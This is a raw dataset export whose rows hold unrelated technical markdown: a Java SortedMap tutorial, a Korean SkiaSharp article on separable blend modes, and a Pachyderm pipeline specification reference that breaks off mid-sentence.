hexsha
stringlengths 40
40
| size
int64 5
1.04M
| ext
stringclasses 6
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
344
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
11
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
344
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
11
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
344
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
11
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
1.04M
| avg_line_length
float64 1.14
851k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
| lid
stringclasses 191
values | lid_prob
float64 0.01
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
977ab16afda9bb87810033c70b7091abfa5e6ee3 | 3,375 | md | Markdown | _drafts/BigJava/Collections/The SortedMap Interface.md | li-jiabao/lijiabao.github.io | f42a68eeeb57e54b6b628030379255d9ac00b131 | [
"MIT"
] | null | null | null | _drafts/BigJava/Collections/The SortedMap Interface.md | li-jiabao/lijiabao.github.io | f42a68eeeb57e54b6b628030379255d9ac00b131 | [
"MIT"
] | null | null | null | _drafts/BigJava/Collections/The SortedMap Interface.md | li-jiabao/lijiabao.github.io | f42a68eeeb57e54b6b628030379255d9ac00b131 | [
"MIT"
] | null | null | null |
# The SortedMap Interface
A
[`SortedMap`](https://docs.oracle.com/javase/8/docs/api/java/util/SortedMap.html) is a
[`Map`](https://docs.oracle.com/javase/8/docs/api/java/util/Map.html) that maintains its entries in ascending order, sorted according to the keys' natural ordering, or according to a `Comparator` provided at the time of the `SortedMap` creation. Natural ordering and `Comparator`s are discussed in the
[Object Ordering](order.html) section. The `SortedMap` interface provides operations for normal `Map` operations and for the following:
- `Range view` — performs arbitrary range operations on the sorted map
- `Endpoints` — returns the first or the last key in the sorted map
- `Comparator access` — returns the `Comparator`, if any, used to sort the map
The following interface is the `Map` analog of
[`SortedSet`](https://docs.oracle.com/javase/8/docs/api/java/util/SortedSet.html).
```
public interface SortedMap<K, V> extends Map<K, V>{
Comparator<? super K> comparator();
SortedMap<K, V> subMap(K fromKey, K toKey);
SortedMap<K, V> headMap(K toKey);
SortedMap<K, V> tailMap(K fromKey);
K firstKey();
K lastKey();
}
```
## Map Operations
The operations `SortedMap` inherits from `Map` behave identically on sorted maps and normal maps with two exceptions:
- The `Iterator` returned by the `iterator` operation on any of the sorted map's `Collection` views traverse the collections in order.
- The arrays returned by the `Collection` views' `toArray` operations contain the keys, values, or entries in order.
Although it isn't guaranteed by the interface, the `toString` method of the `Collection` views in all the Java platform's `SortedMap` implementations returns a string containing all the elements of the view, in order.
## Standard Constructors
By convention, all general-purpose `Map` implementations provide a standard conversion constructor that takes a `Map`; `SortedMap` implementations are no exception. In `TreeMap`, this constructor creates an instance that orders its entries according to their keys' natural ordering. This was probably a mistake. It would have been better to check dynamically to see whether the specified `Map` instance was a `SortedMap` and, if so, to sort the new map according to the same criterion (comparator or natural ordering). Because `TreeMap` took the approach it did, it also provides a constructor that takes a `SortedMap` and returns a new `TreeMap` containing the same mappings as the given `SortedMap`, sorted according to the same criterion. Note that it is the compile-time type of the argument, not its runtime type, that determines whether the `SortedMap` constructor is invoked in preference to the ordinary `map` constructor.
`SortedMap` implementations also provide, by convention, a constructor that takes a `Comparator` and returns an empty map sorted according to the specified `Comparator`. If `null` is passed to this constructor, it returns a `Map` that sorts its mappings according to their keys' natural ordering.
## Comparison to SortedSet
Because this interface is a precise `Map` analog of `SortedSet`, all the idioms and code examples in
[The SortedSet Interface](sorted-set.html) section apply to `SortedMap` with only trivial modifications.
| 70.3125 | 931 | 0.757037 | eng_Latn | 0.990563 |
977b0075715f887efaff4cea61388e630de44cf6 | 17,587 | md | Markdown | docs/xamarin-forms/user-interface/graphics/skiasharp/effects/blend-modes/separable.md | top2topii/xamarin-docs.ko-kr | 9508bf1c99ab58559985d42844a578621a3c0674 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/xamarin-forms/user-interface/graphics/skiasharp/effects/blend-modes/separable.md | top2topii/xamarin-docs.ko-kr | 9508bf1c99ab58559985d42844a578621a3c0674 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/xamarin-forms/user-interface/graphics/skiasharp/effects/blend-modes/separable.md | top2topii/xamarin-docs.ko-kr | 9508bf1c99ab58559985d42844a578621a3c0674 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 분리 가능한 blend 모드
description: 빨강, 녹색 및 파랑 색을 변경 하려면 분리 가능한 혼합 모드를 사용 합니다.
ms.prod: xamarin
ms.technology: xamarin-skiasharp
ms.assetid: 66D1A537-A247-484E-B5B9-FBCB7838FBE9
author: davidbritch
ms.author: dabritch
ms.date: 08/23/2018
ms.openlocfilehash: 8c86782d5b8b8250049d0ae060ca7bd548c5a4ef
ms.sourcegitcommit: c6ff24b524d025d7e87b7b9c25f04c740dd93497
ms.translationtype: MT
ms.contentlocale: ko-KR
ms.lasthandoff: 02/14/2019
ms.locfileid: "56240411"
---
# <a name="the-separable-blend-modes"></a>분리 가능한 blend 모드
[ 샘플 다운로드](https://developer.xamarin.com/samples/xamarin-forms/SkiaSharpForms/Demos/)
이 문서에서 볼 수 있듯이 [ **SkiaSharp Porter 임신 blend 모드**](porter-duff.md), Porter 임신 blend 모드는 일반적으로 클리핑 작업을 수행 합니다. 분리 가능한 blend 모드는 다릅니다. 분리 가능한 모드는 이미지의 개별 빨강, 녹색 및 파랑 색 구성 요소를 변경합니다. 분리 가능한 blend 모드 색의 빨강, 녹색 및 파랑 조합 흰색인 실제로 보여 주기 위해 혼합할 수 있습니다.

## <a name="lighten-and-darken-two-ways"></a>두 가지 방법으로 어둡게 및 밝게
일반적으로 어느 정도 비트맵이 너무 어둡게 또는 밝게 너무 합니다. imabe 어둡게 또는 밝게 분리 가능한 blend 모드를 사용할 수 있습니다. 분리 가능 혼합 모드의 두 실제로 [ `SKBlendMode` ](xref:SkiaSharp.SKBlendMode) 열거형 라고 `Lighten` 및 `Darken`합니다.
이러한 두 가지 모드에서 보여 합니다 **어둡게 및 밝게** 페이지입니다. XAML 파일을 두 개를 인스턴스화하고 `SKCanvasView` 개체와 두 개의 `Slider` 뷰:
```xaml
<ContentPage xmlns="http://xamarin.com/schemas/2014/forms"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:skia="clr-namespace:SkiaSharp.Views.Forms;assembly=SkiaSharp.Views.Forms"
x:Class="SkiaSharpFormsDemos.Effects.LightenAndDarkenPage"
Title="Lighten and Darken">
<StackLayout>
<skia:SKCanvasView x:Name="lightenCanvasView"
VerticalOptions="FillAndExpand"
PaintSurface="OnCanvasViewPaintSurface" />
<Slider x:Name="lightenSlider"
Margin="10"
ValueChanged="OnSliderValueChanged" />
<skia:SKCanvasView x:Name="darkenCanvasView"
VerticalOptions="FillAndExpand"
PaintSurface="OnCanvasViewPaintSurface" />
<Slider x:Name="darkenSlider"
Margin="10"
ValueChanged="OnSliderValueChanged" />
</StackLayout>
</ContentPage>
```
첫 번째 `SKCanvasView` 하 고 `Slider` 시연 `SKBlendMode.Lighten` 하 고 두 번째 쌍은 보여 줍니다 `SKBlendMode.Darken`합니다. 두 개의 `Slider` 뷰는 동일한 공유 `ValueChanged` 처리기 및 두 개의 `SKCanvasView` 동일한 공유 `PaintSurface` 처리기입니다. 개체는 모두 이벤트 처리기 검사 이벤트를 발생 합니다.
```csharp
public partial class LightenAndDarkenPage : ContentPage
{
SKBitmap bitmap = BitmapExtensions.LoadBitmapResource(
typeof(SeparableBlendModesPage),
"SkiaSharpFormsDemos.Media.Banana.jpg");
public LightenAndDarkenPage ()
{
InitializeComponent ();
}
void OnSliderValueChanged(object sender, ValueChangedEventArgs args)
{
if ((Slider)sender == lightenSlider)
{
lightenCanvasView.InvalidateSurface();
}
else
{
darkenCanvasView.InvalidateSurface();
}
}
void OnCanvasViewPaintSurface(object sender, SKPaintSurfaceEventArgs args)
{
SKImageInfo info = args.Info;
SKSurface surface = args.Surface;
SKCanvas canvas = surface.Canvas;
canvas.Clear();
// Find largest size rectangle in canvas
float scale = Math.Min((float)info.Width / bitmap.Width,
(float)info.Height / bitmap.Height);
SKRect rect = SKRect.Create(scale * bitmap.Width, scale * bitmap.Height);
float x = (info.Width - rect.Width) / 2;
float y = (info.Height - rect.Height) / 2;
rect.Offset(x, y);
// Display bitmap
canvas.DrawBitmap(bitmap, rect);
// Display gray rectangle with blend mode
using (SKPaint paint = new SKPaint())
{
if ((SKCanvasView)sender == lightenCanvasView)
{
byte value = (byte)(255 * lightenSlider.Value);
paint.Color = new SKColor(value, value, value);
paint.BlendMode = SKBlendMode.Lighten;
}
else
{
byte value = (byte)(255 * (1 - darkenSlider.Value));
paint.Color = new SKColor(value, value, value);
paint.BlendMode = SKBlendMode.Darken;
}
canvas.DrawRect(rect, paint);
}
}
}
```
`PaintSurface` 처리기 비트맵에 대 한 적합 한 사각형을 계산 합니다. 해당 비트맵을 표시 하 고 다음 사용 하 여 비트맵 사각형을 표시 하는 처리기를 `SKPaint` 개체를 해당 `BlendMode` 속성으로 설정 `SKBlendMode.Lighten` 또는 `SKBlendMode.Darken`합니다. 합니다 `Color` 속성을 기반으로 하는 회색 음영을 `Slider`합니다. 에 대 한 합니다 `Lighten` 모드, 색 범위가 검정에서을 흰색으로 대해서는 `Darken` 흰색에서 검은색 범위의 모드입니다.
왼쪽에서 오른쪽 스크린샷을 표시 점점 더 큰 `Slider` 위쪽 이미지 밝은 가져오고 아래쪽 이미지 가져옵니다 음영이 짙을 수록 값:
[](separable-images/LightenAndDarken-Large.png#lightbox)
이 프로그램을 분리 가능한 blend 모드를 사용 하는 일반적인 방법으로 보여 줍니다. 대상은 자주 비트맵 일종의 이미지입니다. 원본이 사용 하 여 표시 사각형을 `SKPaint` 개체를 해당 `BlendMode` 분리 가능한 blend 모드를 설정 하는 속성입니다. 사각형 (이므로 여기) 단색 수 또는 그라데이션 합니다. 투명도 _되지_ 분리 가능한 blend 모드를 사용 하 여 일반적으로 사용 됩니다.
이 프로그램을 사용 하 여 실험 시에 이러한 두 혼합 모드 밝게 및 이미지를 균일 하 게 어둡게 하지 않는 알 수 있습니다. 대신는 `Slider` 일종의 임계값을 설정 하는 것 같습니다. 예를 들어을 늘리면 합니다 `Slider` 에 대 한는 `Lighten` 모드 이미지의 어두운 영역 가져오기 light 먼저 밝은 영역을 동일 하 게 유지 하는 동안.
에 대 한는 `Lighten` 모드 대상 픽셀 (Dr Dg, Db)의 RGB 색 값 이며 원본 픽셀 색 (Sr Sg, Sb), 출력은 다음 (또는 Og, Ob) 다음과 같이 계산 합니다.
`Or = max(Dr, Sr)` `Og = max(Dg, Sg)`
`Ob = max(Db, Sb)`
이와 별도로, 빨강, 녹색 및 파랑에 대 한 결과 원본과 대상의 큽니다. 이 대상의 어두운 영역을 먼저 밝게의 효과 생성 합니다.
`Darken` 모드는 비슷한 점을 제외 하 고 결과 원본과 대상의 가장 작은 수입니다.
`Or = min(Dr, Sr)` `Og = min(Dg, Sg)`
`Ob = min(Db, Sb)`
빨강, 녹색 및 파랑 구성 요소는 각각 별도로 처리는 이러한 모드를 혼합 하는 이유는 라고 합니다 _분리 가능한_ 혼합 모드입니다. 이러한 이유로 약어 **Dc** 하 고 **Sc** 대상 및 소스 색을 사용할 수 있으며 계산 각 빨강, 녹색 및 파랑 구성 요소를 개별적으로 적용할 것으로 간주 됩니다.
다음 표에서 수행할 작업의 간략 한 설명 사용 하 여 모든 분리 가능한 blend 모드를 보여 줍니다. 두 번째 열 변하지를 생성 하는 소스 색을 표시 합니다.
| 혼합 모드 | 변경 안 함 | 작업 |
| ------------ | --------- | --------- |
| `Plus` | 검정 | 색을 추가 하 여: Sc + Dc |
| `Modulate` | 하얀 | 색을 곱하여 어두워집니다. Sc·Dc |
| `Screen` | 검정 | 보완 제품을 보완 합니다. Sc + Dc – Sc·Dc |
| `Overlay` | 회색 | 역 `HardLight` |
| `Darken` | 하얀 | 최소 색: min (Sc, Dc) |
| `Lighten` | 검정 | 색의 최대: max (Sc, Dc) |
| `ColorDodge` | 검정 | 원본에 따라 대상 어둡게 |
| `ColorBurn` | 하얀 | 원본에 따라 대상 어둡게 |
| `HardLight` | 회색 | 강한 집중 미치는 비슷합니다 |
| `SoftLight` | 회색 | 소프트 추천의 결과 비슷하게 |
| `Difference` | 검정 | 음영이 짙을 수록 더 밝은에서 뺍니다. Abs(Dc – Sc) |
| `Exclusion` | 검정 | 유사한 `Difference` 하지만 낮은 대비 |
| `Multiply` | 하얀 | 색을 곱하여 어두워집니다. Sc·Dc |
W3C에서 자세한 알고리즘을 찾을 수 있습니다 [ **합성 하 고 수준 1 혼합** ](https://www.w3.org/TR/compositing-1/) 사양과 Skia [ **SkBlendMode 참조** ](https://skia.org/user/api/SkBlendMode_Reference)이지만 이러한 두 원본의 표기법 같지 않습니다. 에 유의 `Plus` Porter 임신 blend 모드로, 일반적으로 간주 됩니다 및 `Modulate` W3C 사양과의 일부가 아닙니다.
원본 투명 인 경우 다음 모든 분리에 대 한 혼합 모드 제외 하 고 `Modulate`, 혼합 모드에 영향을 주지 않습니다. 앞에서 살펴본 것 처럼는 `Modulate` blend 모드 곱하기의 알파 채널을 통합 합니다. 그렇지 않으면 `Modulate` 것과 동일한 효과가 `Multiply`합니다.
라는 두 가지 모드를 알 수 있습니다 `ColorDodge` 고 `ColorBurn`입니다. 단어 _닷지_ 하 고 _굽기_ photographic 암실 사례에서 발생 합니다. 확대기 빛을 비추는 것과 음수를 통해 사진 인쇄를 수 있습니다. 없는 light를 사용 하 여 인쇄는 흰색입니다. 인쇄는 음영이 짙을 수록 더 긴 기간에 대 한 인쇄에 자세한 light 떨어지면 가져옵니다. 인쇄 결정권자는 늦는 해당 영역 밝은 print의 특정 부분에서 빛의 일부를 차단 하는 직접 또는 작은 개체 경우가 많습니다. 이 이라고 _닷지_합니다. 직접 어두워집니다 라는 특정 위치에 자세한 조명 하 고 (또는 광원의 대부분을 차단 하는 실습)에 구멍이 있는 불투명 자료를 사용할 수 있습니다 반대로 _굽기_합니다.
합니다 **닷지 및 Burn** 프로그램은 매우 비슷합니다 **어둡게 및 밝게**합니다. XAML 파일이 동일 하지만 다른 요소 이름의 구조적 및 마찬가지로 코드 숨김 파일이 상당히 유사 하지만 이러한 두 혼합 모드의 효과 상당히 다릅니다.
[](separable-images/DodgeAndBurn-Large.png#lightbox)
소규모 `Slider` 값을 `Lighten` 모드의 어두운 영역 하는 동안 먼저 `ColorDodge` 더 균일 하 게 밝게.
이미지 처리 응용 프로그램에는 종종 닷지 및 마찬가지로 한 암실 특정 영역으로 제한 됩니다 수 있습니다. 그라데이션 또는 다양 한 회색 음영을 사용 하 여 비트맵에서 수행할 수 있습니다.
## <a name="exploring-the-separable-blend-modes"></a>분리 가능한 blend 모드를 탐색합니다.
합니다 **분리 가능한 Blend 모드** 페이지를 사용 하면 모든 분리 가능한 blend 모드를 검사할 수 있습니다. 비트맵 대상과 blend 모드 중 하나를 사용 하 여 색이 칠해진된 사각형 원본을 표시 합니다.
XAML 파일은 정의 `Picker` (blend 모드를 선택)를와 네 개의 슬라이더입니다. 처음 세 개의 슬라이더 원본의 빨강, 녹색 및 파랑 구성 요소를 설정할 수 있습니다. 네 번째 슬라이더는 회색 음영을 설정 하 여 해당 값을 재정의 하는 데 사용 됩니다. 개별 슬라이더 식별 되지 않습니다 하지만 색 해당 함수를 나타냅니다.
```xaml
<?xml version="1.0" encoding="utf-8" ?>
<ContentPage xmlns="http://xamarin.com/schemas/2014/forms"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:skia="clr-namespace:SkiaSharp;assembly=SkiaSharp"
xmlns:skiaviews="clr-namespace:SkiaSharp.Views.Forms;assembly=SkiaSharp.Views.Forms"
x:Class="SkiaSharpFormsDemos.Effects.SeparableBlendModesPage"
Title="Separable Blend Modes">
<StackLayout>
<skiaviews:SKCanvasView x:Name="canvasView"
VerticalOptions="FillAndExpand"
PaintSurface="OnCanvasViewPaintSurface" />
<Picker x:Name="blendModePicker"
Title="Blend Mode"
Margin="10, 0"
SelectedIndexChanged="OnPickerSelectedIndexChanged">
<Picker.ItemsSource>
<x:Array Type="{x:Type skia:SKBlendMode}">
<x:Static Member="skia:SKBlendMode.Plus" />
<x:Static Member="skia:SKBlendMode.Modulate" />
<x:Static Member="skia:SKBlendMode.Screen" />
<x:Static Member="skia:SKBlendMode.Overlay" />
<x:Static Member="skia:SKBlendMode.Darken" />
<x:Static Member="skia:SKBlendMode.Lighten" />
<x:Static Member="skia:SKBlendMode.ColorDodge" />
<x:Static Member="skia:SKBlendMode.ColorBurn" />
<x:Static Member="skia:SKBlendMode.HardLight" />
<x:Static Member="skia:SKBlendMode.SoftLight" />
<x:Static Member="skia:SKBlendMode.Difference" />
<x:Static Member="skia:SKBlendMode.Exclusion" />
<x:Static Member="skia:SKBlendMode.Multiply" />
</x:Array>
</Picker.ItemsSource>
<Picker.SelectedIndex>
0
</Picker.SelectedIndex>
</Picker>
<Slider x:Name="redSlider"
MinimumTrackColor="Red"
MaximumTrackColor="Red"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Slider x:Name="greenSlider"
MinimumTrackColor="Green"
MaximumTrackColor="Green"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Slider x:Name="blueSlider"
MinimumTrackColor="Blue"
MaximumTrackColor="Blue"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Slider x:Name="graySlider"
MinimumTrackColor="Gray"
MaximumTrackColor="Gray"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Label x:Name="colorLabel"
HorizontalTextAlignment="Center" />
</StackLayout>
</ContentPage>
```
코드 숨김 파일 비트맵 리소스 중 하나를 로드 하 고 캔버스의 위쪽 절반에서 한 번에 다시 아래쪽을 두 번 그립니다 캔버스의 절반.
```csharp
public partial class SeparableBlendModesPage : ContentPage
{
SKBitmap bitmap = BitmapExtensions.LoadBitmapResource(
typeof(SeparableBlendModesPage),
"SkiaSharpFormsDemos.Media.Banana.jpg");
public SeparableBlendModesPage()
{
InitializeComponent();
}
void OnPickerSelectedIndexChanged(object sender, EventArgs args)
{
canvasView.InvalidateSurface();
}
void OnSliderValueChanged(object sender, ValueChangedEventArgs e)
{
if (sender == graySlider)
{
redSlider.Value = greenSlider.Value = blueSlider.Value = graySlider.Value;
}
colorLabel.Text = String.Format("Color = {0:X2} {1:X2} {2:X2}",
(byte)(255 * redSlider.Value),
(byte)(255 * greenSlider.Value),
(byte)(255 * blueSlider.Value));
canvasView.InvalidateSurface();
}
void OnCanvasViewPaintSurface(object sender, SKPaintSurfaceEventArgs args)
{
SKImageInfo info = args.Info;
SKSurface surface = args.Surface;
SKCanvas canvas = surface.Canvas;
canvas.Clear();
// Draw bitmap in top half
SKRect rect = new SKRect(0, 0, info.Width, info.Height / 2);
canvas.DrawBitmap(bitmap, rect, BitmapStretch.Uniform);
// Draw bitmap in bottom halr
rect = new SKRect(0, info.Height / 2, info.Width, info.Height);
canvas.DrawBitmap(bitmap, rect, BitmapStretch.Uniform);
// Get values from XAML controls
SKBlendMode blendMode =
(SKBlendMode)(blendModePicker.SelectedIndex == -1 ?
0 : blendModePicker.SelectedItem);
SKColor color = new SKColor((byte)(255 * redSlider.Value),
(byte)(255 * greenSlider.Value),
(byte)(255 * blueSlider.Value));
// Draw rectangle with blend mode in bottom half
using (SKPaint paint = new SKPaint())
{
paint.Color = color;
paint.BlendMode = blendMode;
canvas.DrawRect(rect, paint);
}
}
}
```
아래쪽에는 `PaintSurface` 처리기를 사각형 선택한 blend 모드 및 선택한 색을 사용 하 여 두 번째 비트맵 위에 그려집니다. 맨 위에 있는 원래 비트맵을 사용 하 여 맨 아래에서 수정 된 비트맵을 비교할 수 있습니다.
[](separable-images/SeparableBlendModes-Large.png#lightbox)
## <a name="additive-and-subtractive-primary-colors"></a>가산 및 무언가 감 기본 색
합니다 **기본 색** 페이지는 빨강, 녹색 및 파랑의 세 가지 겹치는 원을 그립니다.
[](separable-images/PrimaryColors-Additive.png#lightbox)
가산적 기본 색입니다. 녹청, 자홍, 노랑, 두 조합을 생성 하 고 세 가지의 조합은 흰색입니다.
사용 하 여 이러한 세 개의 원으로 그려집니다 합니다 `SKBlendMode.Plus` 있지만 모드를 사용할 수도 있습니다 `Screen`를 `Lighten`, 또는 `Difference` 같은 효과 대 한 합니다. 프로그램은 다음과 같습니다.
```csharp
public class PrimaryColorsPage : ContentPage
{
bool isSubtractive;
public PrimaryColorsPage ()
{
Title = "Primary Colors";
SKCanvasView canvasView = new SKCanvasView();
canvasView.PaintSurface += OnCanvasViewPaintSurface;
// Switch between additive and subtractive primaries at tap
TapGestureRecognizer tap = new TapGestureRecognizer();
tap.Tapped += (sender, args) =>
{
isSubtractive ^= true;
canvasView.InvalidateSurface();
};
canvasView.GestureRecognizers.Add(tap);
Content = canvasView;
}
void OnCanvasViewPaintSurface(object sender, SKPaintSurfaceEventArgs args)
{
SKImageInfo info = args.Info;
SKSurface surface = args.Surface;
SKCanvas canvas = surface.Canvas;
canvas.Clear();
SKPoint center = new SKPoint(info.Rect.MidX, info.Rect.MidY);
float radius = Math.Min(info.Width, info.Height) / 4;
float distance = 0.8f * radius; // from canvas center to circle center
SKPoint center1 = center +
new SKPoint(distance * (float)Math.Cos(9 * Math.PI / 6),
distance * (float)Math.Sin(9 * Math.PI / 6));
SKPoint center2 = center +
new SKPoint(distance * (float)Math.Cos(1 * Math.PI / 6),
distance * (float)Math.Sin(1 * Math.PI / 6));
SKPoint center3 = center +
new SKPoint(distance * (float)Math.Cos(5 * Math.PI / 6),
distance * (float)Math.Sin(5 * Math.PI / 6));
using (SKPaint paint = new SKPaint())
{
if (!isSubtractive)
{
paint.BlendMode = SKBlendMode.Plus;
System.Diagnostics.Debug.WriteLine(paint.BlendMode);
paint.Color = SKColors.Red;
canvas.DrawCircle(center1, radius, paint);
paint.Color = SKColors.Lime; // == (00, FF, 00)
canvas.DrawCircle(center2, radius, paint);
paint.Color = SKColors.Blue;
canvas.DrawCircle(center3, radius, paint);
}
else
{
paint.BlendMode = SKBlendMode.Multiply
System.Diagnostics.Debug.WriteLine(paint.BlendMode);
paint.Color = SKColors.Cyan;
canvas.DrawCircle(center1, radius, paint);
paint.Color = SKColors.Magenta;
canvas.DrawCircle(center2, radius, paint);
paint.Color = SKColors.Yellow;
canvas.DrawCircle(center3, radius, paint);
}
}
}
}
```
포함 하는 프로그램을 `TabGestureRecognizer`입니다. 프로그램에 사용 하 여 화면을 누르거나 탭 하는 경우 `SKBlendMode.Multiply` 무언가 감 세 원색을 표시 하려면:
[](separable-images/PrimaryColors-Subtractive-Large.png#lightbox)
`Darken` 모드 이와 같은 효과 대해서도 작동 합니다.
## <a name="related-links"></a>관련 링크
- [SkiaSharp Api](https://docs.microsoft.com/dotnet/api/skiasharp)
- [SkiaSharpFormsDemos (샘플)](https://developer.xamarin.com/samples/xamarin-forms/SkiaSharpForms/Demos/)
| 40.710648 | 393 | 0.605049 | kor_Hang | 0.999834 |
977b53e70bb60a818015caeec0d1ac13e3bf2898 | 24,675 | md | Markdown | doc/reference/pipeline_spec.md | carlsonp/pachyderm | d0362d76234821a1f4dbb44082d98749c166b227 | [
"Apache-2.0"
] | null | null | null | doc/reference/pipeline_spec.md | carlsonp/pachyderm | d0362d76234821a1f4dbb44082d98749c166b227 | [
"Apache-2.0"
] | null | null | null | doc/reference/pipeline_spec.md | carlsonp/pachyderm | d0362d76234821a1f4dbb44082d98749c166b227 | [
"Apache-2.0"
] | null | null | null | # Pipeline Specification
This document discusses each of the fields present in a pipeline specification.
To see how to use a pipeline spec to create a pipeline, refer to the [pachctl
create-pipeline](../pachctl/pachctl_create-pipeline.html) doc.
## JSON Manifest Format
```json
{
"pipeline": {
"name": string
},
"description": string,
"transform": {
"image": string,
"cmd": [ string ],
"stdin": [ string ]
"env": {
string: string
},
"secrets": [ {
"name": string,
"mount_path": string
},
{
"name": string,
"env_var": string,
"key": string
} ],
"image_pull_secrets": [ string ],
"accept_return_code": [ int ],
"debug": bool,
"user": string,
"working_dir": string,
},
"parallelism_spec": {
// Set at most one of the following:
"constant": int,
"coefficient": double
},
"resource_requests": {
"memory": string,
"cpu": double
},
"resource_limits": {
"memory": string,
"cpu": double,
"gpu": double
},
"datum_timeout": string,
"job_timeout": string,
"input": {
<"atom", "cross", "union", "cron", or "git" see below>
},
"output_branch": string,
"egress": {
"URL": "s3://bucket/dir"
},
"standby": bool,
"incremental": bool,
"cache_size": string,
"enable_stats": bool,
"service": {
"internal_port": int,
"external_port": int
},
"max_queue_size": int,
"chunk_spec": {
"number": int,
"size_bytes": int
}
}
------------------------------------
"atom" input
------------------------------------
"atom": {
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
------------------------------------
"cross" or "union" input
------------------------------------
"cross" or "union": [
{
"atom": {
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
},
{
"atom": {
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
}
etc...
]
------------------------------------
"cron" input
------------------------------------
"cron": {
"name": string,
"spec": string,
"repo": string,
"start": time
}
------------------------------------
"git" input
------------------------------------
"git": {
"URL": string,
"name": string,
"branch": string
}
```
In practice, you rarely need to specify all the fields. Most fields either come with sensible defaults or can be nil. Following is an example of a minimal spec:
```json
{
"pipeline": {
"name": "wordcount"
},
"transform": {
"image": "wordcount-image",
"cmd": ["/binary", "/pfs/data", "/pfs/out"]
},
"input": {
"atom": {
"repo": "data",
"glob": "/*"
}
}
}
```
Following is a walk-through of all the fields.
### Name (required)
`pipeline.name` is the name of the pipeline that you are creating. Each
pipeline needs to have a unique name. Pipeline names must:
- contain only alphanumeric characters, `_` and `-`
- begin or end with only alphanumeric characters (not `_` or `-`)
- be no more than 50 characters in length
### Description (optional)
`description` is an optional text field where you can put documentation about the pipeline.
### Transform (required)
`transform.image` is the name of the Docker image that your jobs run in.
`transform.cmd` is the command passed to the Docker run invocation. Note that
as with Docker, cmd is not run inside a shell which means that things like
wildcard globbing (`*`), pipes (`|`) and file redirects (`>` and `>>`) will not
work. To get that behavior, you can set `cmd` to be a shell of your choice
(e.g. `sh`) and pass a shell script to stdin.
`transform.stdin` is an array of lines that are sent to your command on stdin.
Lines need not end in newline characters.
`transform.env` is a map from key to value of environment variables that will be
injected into the container
`transform.secrets` is an array of secrets, they are useful for embedding
sensitive data such as credentials. Secrets reference Kubernetes secrets by
name and specify a path that the secrets should be mounted to, or an
environment variable (`env_var`) that the value should be bound to. Secrets
must set `name` which should be the name of a secret in Kubernetes. Secrets
must also specify either `mount_path` or `env_var` and `key`.
[here](https://kubernetes.io/docs/concepts/configuration/secret/).
`transform.image_pull_secrets` is an array of image pull secrets, image pull
secrets are similar to secrets except that they're mounted before the
containers are created so they can be used to provide credentials for image
pulling. For example, if you are using a private Docker registry for your
images, you can specify it via:
```sh
$ kubectl create secret docker-registry myregistrykey --docker-server=DOCKER_REGISTRY_SERVER --docker-username=DOCKER_USER --docker-password=DOCKER_PASSWORD --docker-email=DOCKER_EMAIL
```
And then tell your pipeline about it via `"image_pull_secrets": [ "myregistrykey" ]`. Read more about image pull secrets
[here](https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod).
`transform.accept_return_code` is an array of return codes (i.e. exit codes)
from your docker command that are considered acceptable, which means that
if your docker command exits with one of the codes in this array, it will
be considered a successful run for the purpose of setting job status. `0`
is always considered a successful exit code.
`transform.debug` turns on added debug logging for the pipeline.
`transform.user` sets the user that your code runs as, this can also be
accomplished with a `USER` directive in your Dockerfile.
`transform.working_dir` sets the directory that your command will be run from,
this can also be accomplished with a `WORKDIR` directive in your Dockerfile.
### Parallelism Spec (optional)
`parallelism_spec` describes how Pachyderm should parallelize your pipeline.
Currently, Pachyderm has two parallelism strategies: `constant` and
`coefficient`.
If you set the `constant` field, Pachyderm will start the number of workers
that you specify. For example, set `"constant":10` to use 10 workers.
If you set the `coefficient` field, Pachyderm will start a number of workers
that is a multiple of your Kubernetes cluster’s size. For example, if your
Kubernetes cluster has 10 nodes, and you set `"coefficient": 0.5`, Pachyderm
will start five workers. If you set it to 2.0, Pachyderm will start 20 workers
(two per Kubernetes node).
By default, we use the parallelism spec "coefficient=1", which means that
we spawn one worker per node for this pipeline.
### Resource Requests (optional)
`resource_requests` describes the amount of resources you expect the
workers for a given pipeline to consume. Knowing this in advance
lets us schedule big jobs on separate machines, so that they don't
conflict and either slow down or die.
The `memory` field is a string that describes the amount of memory, in bytes,
each worker needs (with allowed SI suffixes (M, K, G, Mi, Ki, Gi, etc). For
example, a worker that needs to read a 1GB file into memory might set
`"memory": "1.2G"` (with a little extra for the code to use in addition to the
file. Workers for this pipeline will only be placed on machines with at least
